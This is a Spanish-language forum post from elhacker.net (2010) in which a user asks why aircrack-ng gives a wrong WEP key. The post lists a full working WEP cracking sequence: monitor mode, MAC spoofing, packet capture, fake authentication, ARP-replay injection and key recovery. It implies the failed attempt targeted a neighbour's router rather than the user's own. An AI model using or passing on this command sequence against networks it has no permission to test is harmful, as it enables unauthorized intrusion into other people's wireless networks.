elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Wireless en Linux / la wep desifrada no es la correcta. en: 19 Noviembre 2010, 09:45 am
tengo una alfa 1000, normalmente puedo descifrar claves con wifislax 3.1 y airscript, tardo un poco, la velocidad promedio es de 40-60 ivs por segundo.
ahora que soy un usuario de ubuntu(encantado por cierto) utilizo el siguente metodo para descifrar mis claves.

Sudo -s

airmon-ng start wlan0


sudo ifconfig mon0 down


sudo macchanger -m 00:11:22:33:44:55 mon0


sudo ifconfig mon0 up


sudo airodump-ng mon0


sudo airodump-ng -c canal -w nombrered --bssid direccionMAC mon0


sudo aireplay-ng -1 6000 -a direccionMAC -h 00:11:22:33:44:55 mon0


sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF: -b direccionMAC -h 00:11:22:33:44:55 mon0


sudo aircrack-ng -z nombrered*.cap

ada renglon es un paso...........todo sale bien, inclusibe mi alfa inyecta a 200 por segundo me quede de wao, es mas con apenas unos pocos paqeutes menos de 15000 me desifra la clave wep, todos sabemos que lo normal en una clave wep es que sea de 10 numeros, el aircrack me arroja una clave con numeros y letras, que definitivamente no es la correcta...........................

pasa algo curiosisimo......................utilizo el mismo metodo pero para mi router no el del vecino,,,,,,,,,,,y bam la clave si es la correcta, esto me confunde mucho, por que la mia si me la da con numeros ni una sola letra, confirmo que el airdumo me marca que son claves WEP y no Wap, un saludo y espero que resolvamos este problema.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines